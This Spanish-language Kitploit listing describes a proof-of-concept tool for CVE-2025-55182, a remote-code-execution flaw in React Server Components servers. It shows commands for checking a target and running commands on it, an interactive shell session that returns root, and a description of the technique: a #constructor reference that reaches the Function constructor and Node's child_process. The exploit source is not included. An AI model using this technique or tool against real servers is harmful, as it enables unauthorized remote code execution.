Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-55182-PoC — PoC para CVE-2025-55182 | Kitploit
Herramientas/GitHubGitHub/emiyelbarto/cve-2025-55182-poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubemiyelbarto/cve-2025-55182-poc

CVE-2025-55182-PoC

PoC para CVE-2025-55182

Ver Repositorio
1hace 9 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-55182-PoC

PoC para CVE-2025-55182

root@kitploit:~
Usage: python3 poc.py -u http://target.com --cmd "<cmd_here>"

Aviso legal

Esta herramienta se proporciona únicamente con fines educativos y para pruebas de seguridad autorizadas. El uso de esta herramienta para atacar objetivos sin consentimiento mutuo previo es ilegal. El desarrollador no asume ninguna responsabilidad y no se hace responsable por cualquier uso indebido o daño causado por este programa.

Requisitos

pip install requests

Uso

Puedes ejecutar la herramienta en tres modos: Check, Exploit o Interactive Shell.

root@kitploit:~
usage: poc.py [-h] [-u URL] [--id ID] [-c CMD] [--check]

options:
  -h, --help         show this help message and exit
  -u URL             Target URL (e.g., http://localhost:3000)
  --id ID            Target Server Action ID (default: user-profile-action)
  -c CMD, --cmd CMD  Command to execute directly (non-interactive mode)
  --check            Only check for vulnerability (Crash Method), do not exploit

Ejemplo

Descargar herramienta
root@kitploit:~
python3 poc.py -u http://target-site.com --check

Ejecución de un solo comando

root@kitploit:~
python3 poc.py -u http://target-site.com --cmd "id"

Modo Shell Interactivo

root@kitploit:~
python3 poc.py

# Inside the shell
RSC-Shell> set url http://localhost:3000
[+] URL set to: http://localhost:3000
RSC-Shell> check
[+] TARGET IS VULNERABLE!
RSC-Shell> shell
[*] Starting pseudo-interactive shell. Use 'exit' to return.
cmd> whoami
root

Cómo funciona

El Check: Envía una solicitud multipart definiendo {} en el índice 1, e intenta acceder a ["$1🅰️a"]. Los servidores sin parche fallan (HTTP 500) al intentar acceder a la propiedad a de undefined. Los servidores parcheados devuelven HTTP 200.

El Exploit: Envía una solicitud multipart referenciando el Action ID válido, pero añade #constructor. Esto engaña al serializador para que devuelva el constructor Function, permitiéndonos pasar JavaScript arbitrario (child_process de Node.js) para que sea ejecutado en el servidor.